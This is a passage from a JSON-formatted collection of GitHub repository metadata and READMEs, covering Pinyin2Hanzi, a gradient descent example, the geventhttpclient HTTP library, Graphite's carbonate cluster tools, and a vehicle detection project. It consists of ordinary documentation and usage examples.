item.path)\n'''\u8f93\u51fa\n-18.14644152864202 ['\u4f60', '\u77e5', '\u4e0d', '\u77e5', '\u9053']\n-19.423677486918002 ['\u4f60', '\u53ea', '\u4e0d', '\u77e5', '\u9053']\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhii', 'bu', 'zhi', 'dao'), path_num = 2, log = True)\nfor item in result:\n print(item.score, item.path)\n# \u53d1\u751fKeyError\uff0c`zhii`\u4e0d\u89c4\u8303\n```\n\n#### \u57fa\u4e8eDAG\u7684\u8f6c\u6362\n\u539f\u7406\u662f\u8bcd\u5e93+\u52a8\u6001\u89c4\u5212\u3002\n\n```python\nfrom Pinyin2Hanzi import DefaultDagParams\nfrom Pinyin2Hanzi import dag\n\ndagparams = DefaultDagParams()\n\n## 2\u4e2a\u5019\u9009\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shi'), path_num=2)\nfor item in result:\n print(item.score, item.path)\n''' \u8f93\u51fa\n0.08117536840088911 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u662f']\n0.04149191639287887 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u8bd7']\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shi'), path_num=2, log=True)\nfor item in result:\n print(item.score, item.path)\n''' \u8f93\u51fa\n-2.5111434226494866 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u662f']\n-3.1822566564324477 ['\u4f60\u4e0d\u77e5\u9053', '\u7684\u8bd7']\n'''\n\n## 1\u4e2a\u5019\u9009\nprint( dag(dagparams, ['ti', 'chu', 'le', 'bu', 'cuo', 'de', 'jie', 'jve', 'fang', 'an'], path_num=1) )\n'''\u8f93\u51fa\n[< score=0.0017174549839096384, path=['\u63d0\u51fa\u4e86', '\u4e0d\u9519', '\u7684', '\u89e3\u51b3\u65b9\u6848'] >]\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = dag(dagparams, ('ni', 'bu', 'zhi', 'dao', 'de', 'shii'), path_num=2, log=True)\nprint(result)\n# \u8f93\u51fa\u7a7a\u5217\u8868\uff0c\u56e0\u4e3a`shii`\u4e0d\u5b58\u5728\n```\n\n#### \u81ea\u5b9a\u4e49params\n\u5b9e\u73b0AbstractHmmParams, AbstractDagParams\u8fd9\u4e24\u4e2a\u63a5\u53e3\u5373\u53ef\u3002\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u6e90\u7801\u3002\n\n#### \u5173\u4e8e\u62fc\u97f3\n\u7ed9\u51fa\u7684\u62fc\u97f3\u5fc5\u987b\u662f\u201c\u89c4\u8303\u201d\u7684\u3002\u4f8b\u5982\n\n* \u7565 -> lve\n* \u636e -> ju\n\n\u5217\u4e3e\u6240\u6709\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import all_pinyin\nfor py in all_pinyin():\n print(py)\n```\n\n\u5c06\u62fc\u97f3\u8f6c\u6362\u4e3a\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import simplify_pinyin\n\nprint(simplify_pinyin('lue'))\n# \u8f93\u51fa\uff1a'lve'\n\nprint(simplify_pinyin('l\u00fc\u00e8'))\n# \u8f93\u51fa\uff1a'lve'\n```\n\n\u5224\u65ad\u662f\u5426\u662f\u201c\u89c4\u8303\u201d\u7684\u62fc\u97f3\uff1a\n```python\nfrom Pinyin2Hanzi import is_pinyin\n\nprint(is_pinyin('lue'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('l\u00fc\u00e8'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('lvee'))\n# \u8f93\u51fa\uff1aFalse\n\nprint(is_pinyin('lve'))\n# \u8f93\u51fa\uff1aTrue\n```\n\n## \u8bad\u7ec3\n\u539f\u59cb\u6570\u636e\u548c\u8bad\u7ec3\u4ee3\u7801\u5728`train`\u76ee\u5f55\u4e0b\u3002\u6570\u636e\u6765\u81ea[jpinyin](https://github.com/stuxuhai/jpinyin)\u3001[pinyin](https://github.com/overtrue/pinyin)\u3001[\u641c\u72d7\u8bed\u6599\u5e93-\u4e92\u8054\u7f51\u8bcd\u5e93](http://www.sogou.com/labs/dl/w.html)\u7b49\u3002\u5904\u7406\u6570\u636e\u65f6\u7528\u5230\u4e86\u6c49\u5b57\u8f6c\u62fc\u97f3\n\u5de5\u5177[ChineseTone](https://github.com/letiantian/ChineseTone)\u3002\n\n## \u539f\u7406\n[\u5982\u4f55\u5b9e\u73b0\u62fc\u97f3\u4e0e\u6c49\u5b57\u7684\u4e92\u76f8\u8f6c\u6362](https://www.letianbiji.com/machine-learning/2016-02-08-pinyin-hanzi.html)\n\n## License\nMIT\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattnedrich/GradientDescentExample", "link": "https://github.com/mattnedrich/GradientDescentExample", "tags": [], "stars": 512, "description": "Example demonstrating how gradient descent may be used to solve a linear regression problem", "lang": "Python", "repo_lang": "", "readme": "## Gradient Descent Example for Linear Regression\nThis example project demonstrates how the [gradient descent](http://en.wikipedia.org/wiki/Gradient_descent) algorithm may be used to solve a [linear regression](http://en.wikipedia.org/wiki/Linear_regression) problem. A more detailed description of this example can be found [here](https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/).\n\n### Code Requirements\nThe example code is in Python ([version 2.6](https://www.python.org/doc/versions/) or higher will work). The only other requirement is [NumPy](http://www.numpy.org/).\n\n### Description\nThis code demonstrates how a gradient descent search may be used to solve the linear regression problem of fitting a line to a set of points. In this problem, we wish to model a set of points using a line. The line model is defined by two parameters - the line's slope `m`, and y-intercept `b`. Gradient descent attemps to find the best values for these parameters, subject to an error function.\n\nThe code contains a main function called `run`. This function defines a set of parameters used in the gradient descent algorithm including an initial guess of the line slope and y-intercept, the learning rate to use, and the number of iterations to run gradient descent for. \n\n```python\ninitial_b = 0 # initial y-intercept guess\ninitial_m = 0 # initial slope guess\nnum_iterations = 1000\n``` \n\nUsing these parameters a gradient descent search is executed on a sample data set of 100 ponts. Here is a visualization of the search running for 200 iterations using an initial guess of `m = 0`, `b = 0`, and a learning rate of `0.000005`.\n\n\n\n### Execution\nTo run the example, simply run the `gradient_descent_example.py` file using Python\n\n```\npython gradient_descent_example.py\n```\n\nThe output will look like this\n\n```\nStarting gradient descent at b = 0, m = 0, error = 5565.10783448\nRunning...\nAfter 1000 iterations b = 0.0889365199374, m = 1.47774408519, error = 112.614810116\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "geventhttpclient/geventhttpclient", "link": "https://github.com/geventhttpclient/geventhttpclient", "tags": [], "stars": 511, "description": "A high performance, concurrent http client library for python with gevent", "lang": "Python", "repo_lang": "", "readme": "# geventhttpclient\n\n[![Build Status](https://travis-ci.org/gwik/geventhttpclient.svg?branch=master)](https://travis-ci.org/gwik/geventhttpclient)\n\nA high performance, concurrent HTTP client library for python using \n[gevent](http://gevent.org).\n\n`gevent.httplib` support was removed in [gevent 1.0](https://github.com/surfly/gevent/commit/b45b83b1bc4de14e3c4859362825044b8e3df7d6\n), **geventhttpclient** now provides that missing functionality.\n\n**geventhttpclient** uses a fast [http parser](https://github.com/nodejs/llhttp),\nwritten in C.\n\n**geventhttpclient** has been specifically designed for high concurrency,\nstreaming and support HTTP 1.1 persistent connections. More generally it is\ndesigned for efficiently pulling from REST APIs and streaming APIs\nlike Twitter's.\n\nSafe SSL support is provided by default. **geventhttpclient** depends on\nthe certifi CA Bundle. This is the same CA Bundle which ships with the\nRequests codebase, and is derived from Mozilla Firefox's canonical set.\n\nAs of version 1.5, only Python 3.6+ is fully supported (with prebuilt wheels), \nbut Python 2.7 and 3.5 *should* work too.\n\nUse of SSL/TLS with python 2.7.9 is not recommended and may be broken.\n\nA simple example:\n\n```python\n#!/usr/bin/python\n\nfrom geventhttpclient import HTTPClient\nfrom geventhttpclient.url import URL\n\nurl = URL('http://gevent.org/')\n\nhttp = HTTPClient(url.host)\n\n# issue a get request\nresponse = http.get(url.request_uri)\n\n# read status_code\nresponse.status_code\n\n# read response body\nbody = response.read()\n\n# close connections\nhttp.close()\n```\n\n## httplib compatibility and monkey patch\n\n**geventhttpclient.httplib** module contains classes for drop in\nreplacement of httplib connection and response objects.\nIf you use httplib directly you can replace the **httplib** imports\nby **geventhttpclient.httplib**.\n\n```python\n# from httplib import HTTPConnection\nfrom geventhttpclient.httplib import HTTPConnection\n```\n\nIf you use **httplib2**, **urllib** or **urllib2**; you can patch **httplib** to\nuse the wrappers from **geventhttpclient**.\nFor **httplib2**, make sure you patch before you import or the *super*\ncalls will fail.\n\n```python\nimport geventhttpclient.httplib\ngeventhttpclient.httplib.patch()\n\nimport httplib2\n```\n\n## High Concurrency\n\nHTTPClient has connection pool built in and is greenlet safe by design.\nYou can use the same instance among several greenlets.\n\n```python\n#!/usr/bin/env python\n\nimport gevent.pool\nimport json\n\nfrom geventhttpclient import HTTPClient\nfrom geventhttpclient.url import URL\n\n\n# go to http://developers.facebook.com/tools/explorer and copy the access token\nTOKEN = ''\n\nurl = URL('https://graph.facebook.com/me/friends')\nurl['access_token'] = TOKEN\n\n# setting the concurrency to 10 allow to create 10 connections and\n# reuse them.\nhttp = HTTPClient.from_url(url, concurrency=10)\n\nresponse = http.get(url.request_uri)\nassert response.status_code == 200\n\n# response comply to the read protocol. It passes the stream to\n# the json parser as it's being read.\ndata = json.load(response)['data']\n\ndef print_friend_username(http, friend_id):\n friend_url = URL('/' + str(friend_id))\n friend_url['access_token'] = TOKEN\n # the greenlet will block until a connection is available\n response = http.get(friend_url.request_uri)\n assert response.status_code == 200\n friend = json.load(response)\n if friend.has_key('username'):\n print '%s: %s' % (friend['username'], friend['name'])\n else:\n print '%s has no username.' % friend['name']\n\n# allow to run 20 greenlet at a time, this is more than concurrency\n# of the http client but isn't a problem since the client has its own\n# connection pool.\npool = gevent.pool.Pool(20)\nfor item in data:\n friend_id = item['id']\n pool.spawn(print_friend_username, http, friend_id)\n\npool.join()\nhttp.close()\n```\n\n## Streaming\n\n**geventhttpclient** supports streaming.\nResponse objects have a read(N) and readline() method that read the stream\nincrementally.\nSee *src/examples/twitter_streaming.py* for pulling twitter stream API.\n\nHere is an example on how to download a big file chunk by chunk to save memory:\n\n```python\n#!/usr/bin/env python\n\nfrom geventhttpclient import HTTPClient, URL\n\nurl = URL('http://127.0.0.1:80/100.dat')\nhttp = HTTPClient.from_url(url)\nresponse = http.get(url.query_string)\nassert response.status_code == 200\n\nCHUNK_SIZE = 1024 * 16 # 16KB\nwith open('/tmp/100.dat', 'w') as f:\n data = response.read(CHUNK_SIZE)\n while data:\n f.write(data)\n data = response.read(CHUNK_SIZE)\n```\n\n## Benchmarks\n\nThe benchmark does 1000 get requests against a local nginx server with\na concurrency of 10. See *benchmarks* folder.\n\n- httplib2 with geventhttpclient monkey patch (*benchmarks/httplib2_patched.py*): **~2500 req/s**\n- geventhttpclient.HTTPClient (*benchmarks/httpclient.py*): **~4000 req/s**\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "graphite-project/carbonate", "link": "https://github.com/graphite-project/carbonate", "tags": ["carbonate", "graphite-clusters", "graphite", "python"], "stars": 511, "description": "Utilities for managing graphite clusters", "lang": "Python", "repo_lang": "", "readme": "# Carbonate\n\n> \"Pop bottles.\" *-- Birdman*\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/99e1654102b74d82a63505145334e7ed)](https://www.codacy.com/app/graphite-project/carbonate?utm_source=github.com&utm_medium=referral&utm_content=graphite-project/carbonate&utm_campaign=badger)\n[![Build Status](https://travis-ci.org/graphite-project/carbonate.svg?branch=master)](https://travis-ci.org/graphite-project/carbonate)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fgraphite-project%2Fcarbonate.svg?type=shield)](https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fgraphite-project%2Fcarbonate?ref=badge_shield)\n[![codecov](https://codecov.io/gh/graphite-project/carbonate/branch/master/graph/badge.svg)](https://codecov.io/gh/graphite-project/carbonate)\n\nGraphite clusters are pretty cool. Here are some primitive tools to help you manage your graphite clusters.\n\nAll of the tools support two common arguments; the path to a config file, and the name of the cluster. Using these tools alongside a config file that describes your graphite clusters you can build up scripts to manage your metrics. Some of the tools could easily be replaced with one-liners in shell, but exist here for convenience and readability. The goal is to provide fast, predictable utilities that can easily be composed into more advanced tooling.\n\n## Install\n[Carbonate is available from Python official third party repository](https://pypi.python.org/pypi/carbonate/0.2.1) (aka PyPi) and as such can be installed via regular Python package managers.\nNote that you might have to install a python package manager (e.g. apt-get install python-setuptools on a ubuntu host)\n\n```\npip install carbonate\n```\n## The Config\n\nCarbonate expects a configuration file that defines the clusters in your environment. The default config file is located at `/opt/graphite/conf/carbonate.conf` or can be provided on the command line. The default cluster is named 'main'. Both defaults can be overridden by setting in the environment `CARBONATE_CONFIG` and `CARBONATE_CLUSTER` respectively.\n\n```\n[main]\nDESTINATIONS = 192.168.9.13:2004:carbon01, 192.168.9.15:2004:carbon02, 192.168.6.20:2004:carbon03\nREPLICATION_FACTOR = 2\nSSH_USER = carbon\n\n[agg]\nDESTINATIONS = 192.168.9.13:2004:carbon01, 192.168.9.15:2004:carbon02, 192.168.6.20:2004:carbon03\nRELAY_METHOD = aggregated-consistent-hashing\nREPLICATION_FACTOR = 2\nSSH_USER = carbon\n\n[fnv]\nDESTINATIONS = 192.168.9.13:2004:ba603c36342304ed77953f84ac4d357b, 192.168.9.15:2004:5dd63865534f84899c6e5594dba6749a, 192.168.6.20:2004:866a18b81f2dc4649517a1df13e26f28\nREPLICATION_FACTOR = 2\nSSH_USER = carbonate\nHASHING_TYPE = fnv1a_ch\n```\n\nYou should take care to match the list of destination IPs or hostnames to the nodes in your cluster (i.e. it should match with routing configuretion of your carbon relay). Order is important because of how the consistent hash ring is created.\n\nYou can configure the relay method to be one of \"consistent-hashing\" or \"aggregated-consistent-hashing\". If omitted, \"consistent-hashing\" is used by default. Use of \"aggregated-consistent-hashing\" usually requires a rules file to be provided to relevant commands.\n\nThe replication factor should match the replication factor for the cluster.\n\nAlso, you can choose to provide a SSH user that will be used when carbonate requires connecting to another node in the cluster to perform an operation. If this is not provided, then the current user executing the command will be chosen.\n\nFinally, you can provide HASHING_TYPE of your cluster. Default is `carbon_ch`, also `fnv1a_ch` is supported. Please note that for using `fnv1a_ch` hashing you need `carbon` 1.0.2 or newer installed (or you need to use [carbon-c-relay](https://github.com/grobian/carbon-c-relay) relay instead).\n\n## The Tools\n\n### carbon-hosts\n\n```\nusage: carbon-hosts [-h] [-c CONFIG_FILE] [-C CLUSTER]\n\nReturn the addresses for all nodes in a cluster\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n```\n\n### carbon-lookup\n\n```\nusage: carbon-lookup [-h] [-c CONFIG_FILE] [-C CLUSTER] [-s] METRIC\n\nLookup where a metric lives in a carbon cluster\n\npositional arguments:\n METRIC Full metric name to search for\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -a AGGREGATION_RULES, --aggregation-rules AGGREGATION_RULES\n File containing rules used in conjunction with the\n \"aggregated-consistent-hashing\" relay method (default:\n /opt/graphite/conf/aggregation-rules.conf)\n -s, --short Only display the address, without port and cluster\n name (default: False)\n```\n\n### carbon-list\n\n```\nusage: carbon-list [-h] [-c CONFIG_FILE] [-C CLUSTER] [-d STORAGE_DIR]\n\nList the metrics this carbon node contains\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Storage dir (default: /opt/graphite/storage/whisper)\n```\n\n### carbon-sieve\n\n```\nusage: carbon-sieve [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE]\n [-n NODE] [-I]\n\nGiven a list of metrics, output those that belong to a node\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -a AGGREGATION_RULES, --aggregation-rules AGGREGATION_RULES\n File containing rules used in conjunction with the\n \"aggregated-consistent-hashing\" relay method (default:\n /opt/graphite/conf/aggregation-rules.conf)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to filter, or '-' to read\n from STDIN (default: -)\n -n NODE, --node NODE Filter for metrics belonging to this node (default:\n self)\n -I, --invert Invert the sieve, match metrics that do NOT belong to\n a node (default: False)\n```\n\n### carbon-sync\n\n```\nusage: carbon-sync [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] -s\n SOURCE_NODE [-d STORAGE_DIR] [-b BATCH_SIZE]\n [--source-storage-dir SOURCE_STORAGE_DIR]\n [--rsync-options RSYNC_OPTIONS] [--rsync-disable-copy-dest]\n [--tmpdir TMP_STAGING_DIR] [--rsync-max-retries MAX_RETRIES]\n [--rsync-retries-interval SECONDS] [--dirty] [-l] [-o]\n\nSync local metrics using remote nodes in the cluster\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (env: CARBONATE_CONFIG) (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (env: CARBONATE_CLUSTER) (default: main)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to filter, or '-' to read\n from STDIN (default: -)\n -s SOURCE_NODE, --source-node SOURCE_NODE\n Override the source for metrics data (default: None)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Storage dir (default: /opt/graphite/storage/whisper)\n -b BATCH_SIZE, --batch-size BATCH_SIZE\n Batch size for the rsync job (default: 1000)\n --source-storage-dir SOURCE_STORAGE_DIR\n Source storage dir (default:\n /opt/graphite/storage/whisper)\n --rsync-options RSYNC_OPTIONS\n Pass option(s) to rsync. Make sure to use \"--rsync-\n options=\" if option starts with '-' (default: -azpS)\n --rsync-disable-copy-dest\n Avoid --copy-dest, transfer all whisper data between\n nodes. (default: False)\n --rsync-max-retries RETRIES\n Number of times rsync will attempt to copy each batch\n of metrics before moving on. If all retry attempts are\n unsuccessful, carbon-sync will write a file containing\n the name of each metric in the failed batch so they can\n be easily retried at a later time. (Default: 3)\n --rsync-retries-interval SECONDS\n How long to wait in between each rsync retry attempt\n (see --rsync-max-retries). (default: 5)\n -t TMP_STAGING_DIR, --tmpdir TMP_STAGING_DIR\n Specify an alternate location in which the temporary\n rsync staging dirs will be created. This can be useful\n for large syncs where the default location (as chosen\n by mkdtemp) resides on a filesystem that's too small\n to store all the metrics being copied from the remote\n host.\n --dirty If set, don't clean temporary rsync directory\n (default: False)\n -l, --lock Lock whisper files during filling (default: False)\n -o, --overwrite Write all non nullpoints from src to dst (default:\n False)\n```\n\n### carbon-path\n\n```\nusage: carbon-path [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] [-r]\n [-p] [-d STORAGE_DIR]\n\nTransform metric paths to (or from) filesystem paths\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to transform to file\n paths, or '-' to read from STDIN (default: -)\n -r, --reverse Transform from file paths to metric paths (default:\n False)\n -p, --prepend Prepend storage dir to file paths (default: False)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory to prepend when -p given\n (default: /opt/graphite/storage/whisper)\n```\n\n### carbon-stale\n\n```\nusage: carbon-stale [-h] [-c CONFIG_FILE] [-C CLUSTER] [-f METRICS_FILE] [-r]\n [-d STORAGE_DIR] [-l HOURS] [-o HOURS] [-w] [-p]\n\nFind and list potentially stale metrics.\n\noptional arguments:\n -h, --help show this help message and exit\n -c CONFIG_FILE, --config-file CONFIG_FILE\n Config file to use (default:\n /opt/graphite/conf/carbonate.conf)\n -C CLUSTER, --cluster CLUSTER\n Cluster name (default: main)\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names to transform to file\n paths, or '-' to read from STDIN (default: -)\n -r, --reverse Output metrics which are not stale instead (default:\n False)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory to prepend when -p given\n (default: /opt/graphite/storage/whisper)\n -l HOURS, --limit HOURS\n Definition of staleness, in hours (default: 24)\n -o HOURS, --offset HOURS\n Use a whisper data window ending HOURS ago (implies\n -w) (default: 0)\n -w, --whisper Use whisper data instead of filesystem stat() call\n (default: False)\n -p, --paths Print filesystem paths instead of metric names\n (default: False)\n```\n\n### whisper-aggregate\n\n```\nusage: whisper-aggregate [-h] [-f METRICS_FILE] [-d STORAGE_DIR]\n\nSet aggregation for whisper-backed metrics this carbon instance contains\n\noptional arguments:\n -h, --help show this help message and exit\n -f METRICS_FILE, --metrics-file METRICS_FILE\n File containing metric names and aggregation modes, or\n '-' to read from STDIN (default: -)\n -d STORAGE_DIR, --storage-dir STORAGE_DIR\n Whisper storage directory (default:\n /opt/graphite/storage/whisper)\n```\n\n### whisper-fill\n\n```\nusage: whisper-fill [-h] [-l] [-o] SRC DST\n\nBackfill datapoints from one whisper file into another\n\npositional arguments:\n SRC Whisper source file\n DST Whisper destination file\n\noptional arguments:\n -h, --help show this help message and exit\n -l, --lock Lock whisper files during filling (default: False)\n -o, --overwrite Write all non nullpoints from src to dst (default: False)\n```\n\n## Example usage\n\n### Resync a node in a cluster\n\n```\n#!/bin/sh\n#\n# Resync a node from other nodes in the cluster\n#\n\nLOCAL_IP=\"$1\"\n\nfor h in $(carbon-hosts) ; do\n (\n ssh $h -- carbon-list |\n carbon-sieve -n $LOCAL_IP |\n carbon-sync -s $h\n ) &\ndone\n```\n\n### Rebalance a cluster\n\n```\n#!/bin/sh\n#\n# Rebalance a cluster from one size to another. Remember to cleanup metrics\n# that no longer belong when all nodes are rebalanced!\n#\n\nLOCAL_IP=\"$1\"\nOLD_CLUSTER=\"old\"\nNEW_CLUSTER=\"main\"\n\nfor h in $(carbon-hosts -C \"$OLD_CLUSTER\") ; do\n ssh $h -- carbon-list |\n carbon-sieve -C \"$NEW_CLUSTER\" -n $LOCAL_IP |\n carbon-sync -s $h\ndone\n```\n\n### List metrics that don't belong\n\n```\n#!/bin/sh\n#\n# List metrics from disk that don't belong\n#\n\nLOCAL_IP=\"$1\"\n\ncarbon-list | carbon-sieve -I -n $LOCAL_IP\n```\n\n### Listing metrics that have stopped updating\n\nMetrics with whisper data that is entirely blank for the last 2 hours (perhaps\nuseful if you suspect issues with fs timestamps or carbon clients writing in 'the\nfuture'):\n\n```\ncarbon-list | carbon-stale --whisper --limit=2\n```\n\nMetrics whose metrics files appear untouched for 48 hours or more (functionally\nidentical to `find /your/data/dir -type f -mtime +2`):\n\n```\ncarbon-list | carbon-stale --limit=48\n```\n\nMore interesting is if you use ``carbon-stale``, then sieve to identify stale\nmetrics that don't belong here (vs un-stale metrics that *do* belong here but\nare misreported in carbon-sieve due to things like doubled-up periods in metric\npaths due to broken collectors. It's a thing.)\n\n```\ncarbon-list | carbon-stale --limit=48 | carbon-sieve -I -n $LOCAL_IP\n```\n\nTo print file paths for use with e.g. `xargs rm` or whatnot, use `-p`:\n\n```\ncarbon-list | carbon-stale -p | xargs -n 100 rm\n```\n\n\n# License\n\nThe code is available under the MIT license.\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CaptainEven/Vehicle-Car-detection-and-multilabel-classification", "link": "https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification", "tags": [], "stars": 511, "description": "\u4f7f\u7528YOLO_v3_tiny\u548cB-CNN\u5b9e\u73b0\u8857\u5934\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8f66\u8f86\u5c5e\u6027\u7684\u591a\u6807\u7b7e\u8bc6\u522b Using yolo_v3_tiny to do vehicle or car detection and attribute's multilabel classification or recognize", "lang": "Python", "repo_lang": "", "readme": "# Vehicle-Car-detection-and-multilabel-classification \u8f66\u8f86\u68c0\u6d4b\u548c\u591a\u6807\u7b7e\u5c5e\u6027\u8bc6\u522b\n## \u4e00\u4e2a\u57fa\u4e8ePytorch\u7cbe\u7b80\u7684\u6846\u67b6\uff0c\u4f7f\u7528YOLO_v3_tiny\u548cB-CNN\u5b9e\u73b0\u8857\u5934\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8f66\u8f86\u5c5e\u6027\u7684\u591a\u6807\u7b7e\u8bc6\u522b\u3002
(A precise pytorch based framework for using yolo_v3_tiny to do vehicle or car detection and attribute's multilabel classification or recognize)\n\n## \u6548\u679c\u5982\u4e0b: Vehicle detection and recognition results are as follows\uff1a
\n![](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification/blob/master/test_result/test_5.jpg)\n![](https://github.com/CaptainEven/Vehicle-Car-detection-and-multilabel-classification/blob/master/test_result/test_17.jpg)\n
\n\n## \u4f7f\u7528\u65b9\u6cd5 Usage\npython Vehicle_DC -src_dir your_imgs_dir -dst_dir your_result_dir\n\n## \u8bad\u7ec3\u597d\u7684\u6a21\u578b\u6587\u4ef6(\u5305\u62ec\u8f66\u8f86\u68c0\u6d4b\u6a21\u578b\u548c\u591a\u6807\u7b7e\u5206\u7c7b\u6a21\u578b) trained models on baidu drive\n[Tranied models-vehicle detection](https://pan.baidu.com/s/1HwTCVGTmdqkeLnqnxfNL8Q)
\n[Tranied models-vehicle classification](https://pan.baidu.com/s/1XmzjvCgOrrVv0NWTt4Fm3g)
\n\u5728\u8fd0\u884cVehicle_DC\u811a\u672c\u4e4b\u524d\uff0c\u5148\u4e0b\u8f7d\u4e0a\u9762\u7684\u6a21\u578b\u6587\u4ef6\u6216\u8005\u4f7f\u7528\u81ea\u5df1\u9884\u5148\u8bad\u7ec3\u597d\u7684\u6a21\u578b\u6587\u4ef6\uff0c\u5c06car_540000.weights\uff08\u7528\u4e8e\u68c0\u6d4b\uff09\u653e\u5728\u9879\u76ee\u6839\u76ee\u5f55\uff0c\u5c06epoch_39.pth\uff08\u7528\u4e8e\u591a\u6807\u7b7e\u8bc6\u522b\uff09\u653e\u5728\u6839\u76ee\u5f55\u4e0b\u7684checkpoints\u76ee\u5f55\u4e0b\uff0c\u5373\u53ef\u4f7f\u7528Vehicle_DC\u8fd0\u884c\u3002
\nBefore running Vehicle_DC, you should download provided model files provided above or use your own pretrained models. If using models provided, you need to place car_540000.weights on root directory of this project, and place epoch_39.pth on root/checkpoints/.\n\n### \u7a0b\u5e8f\u7b80\u4ecb brief introductions\n#### (1). \u7a0b\u5e8f\u5305\u542b\u4e24\u5927\u6a21\u5757:
The program consists of two parts: first, car detection(only provides model loading and inference code, if you need training code, you can refer to [pytorch_yolo_v3](https://github.com/eriklindernoren/PyTorch-YOLOv3#train)); the car attributes classiyfing(provide both training and testing code, it will predict a vehicle's body color, body direction and car type)\n##### <1>. \u8f66\u8f86\u68c0\u6d4b\u6a21\u5757\uff1a \u53ea\u63d0\u4f9b\u68c0\u6d4b, \u8bad\u7ec3\u4ee3\u7801\u53ef\u4ee5\u53c2\u8003[pytorch_yolo_v3](https://github.com/eriklindernoren/PyTorch-YOLOv3#train);
\n##### <2>. \u591a\u6807\u7b7e\u8bc6\u522b\u6a21\u5757\uff1a\u5305\u542b\u8f66\u8f86\u989c\u8272\u3001\u8f66\u8f86\u671d\u5411\u3001\u8f66\u8f86\u7c7b\u578b\n\u5c06\u8fd9\u4e24\u4e2a\u6a21\u5757\u7ed3\u5408\u5728\u4e00\u8d77\uff0c\u53ef\u4ee5\u540c\u65f6\u5b9e\u73b0\u8f66\u8f86\u7684\u68c0\u6d4b\u548c\u8bc6\u522b\u3002\u4ee5\u6b64\u4e3a\u57fa\u7840\uff0c\u53ef\u4ee5\u5bf9\u5ba4\u5916\u667a\u80fd\u4ea4\u901a\u4fe1\u606f\uff0c\u8fdb\u884c\u4e00\u5b9a\u7a0b\u5ea6\u7684\u7ed3\u6784\u5316\u4fe1\u606f\u63d0\u53d6\u3002
\nCombining these two modules together, you can do vehicle detection and multi-label recognization at the same time. Based on this info, some structured infos in outdoor traffic scenes can be extracted.\n#### (2). \u7a0b\u5e8f\u6a21\u5757\u8be6\u89e3 modules detailed introduction
\n##### <1>. VehicleDC.py
